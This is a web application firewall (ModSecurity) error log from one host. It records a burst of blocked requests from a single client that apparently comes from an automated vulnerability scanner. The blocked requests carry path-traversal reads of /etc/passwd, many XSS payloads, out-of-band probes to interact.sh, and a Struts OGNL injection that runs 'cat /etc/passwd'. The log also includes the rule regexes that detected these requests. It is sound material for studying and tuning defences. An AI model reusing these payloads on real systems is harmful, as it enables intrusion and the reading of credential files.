[Tue Aug 29 11:49:15.382341 2023] [:error] [pid 2373] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAlFH9IAAAAk"]
[Tue Aug 29 11:51:05.274599 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OcCo-f0AAAhoHNwAAAAl"]
[Tue Aug 29 11:51:05.356242 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAl4sWcAAAAf"]
[Tue Aug 29 11:51:05.375018 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAhoHN8AAAAl"]
[Tue Aug 29 11:51:05.414871 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15OcCo-f0AAAl4sWoAAAAf"]
[Tue Aug 29 11:51:05.487033 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAknEL4AAAAB"]
[Tue Aug 29 11:51:06.107177 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OsCo-f0AAAlIBfsAAAAn"]
[Tue Aug 29 11:51:08.535786 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAmHd8gAAAAz"]
[Tue Aug 29 11:51:08.597077 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAmIbOoAAAAo"]
[Tue Aug 29 11:51:09.588955 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAkyyDAAAAAW"]
[Tue Aug 29 11:51:09.641416 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAm5BwAAAAAA"]
[Tue Aug 29 11:51:10.729204 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAmIbPEAAAAo"]
[Tue Aug 29 11:51:11.567381 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAkyyDMAAAAW"]
[Tue Aug 29 11:51:12.783170 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAhhcz8AAAAd"]
[Tue Aug 29 11:51:13.577449 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAl4sXMAAAAf"]
[Tue Aug 29 11:51:13.625346 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAm91mYAAAAG"]
[Tue Aug 29 11:51:13.679163 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAm@5wMAAAAH"]
[Tue Aug 29 11:51:14.684812 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAkr0EIAAAAC"]
[Tue Aug 29 11:51:15.664526 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAlUlhwAAAA0"]
[Tue Aug 29 11:51:15.729221 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15Q8Co-f0AAAm5BxAAAAAA"]
[Tue Aug 29 11:51:15.880526 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAfWODwAAAAL"]
[Tue Aug 29 11:51:15.880567 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAjdQTgAAAAZ"]
[Tue Aug 29 11:51:16.577619 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAnMeooAAAAD"]
[Tue Aug 29 11:51:17.750645 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAnMeo0AAAAD"]
[Tue Aug 29 11:51:17.931232 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAnCKzEAAAAK"]
[Tue Aug 29 11:51:20.533167 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAmNp3sAAAAQ"]
[Tue Aug 29 11:51:20.710730 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAm80OYAAAAF"]
[Tue Aug 29 11:51:21.547962 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAlIBhoAAAAn"]
[Tue Aug 29 11:51:21.629355 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAm7m98AAAAE"]
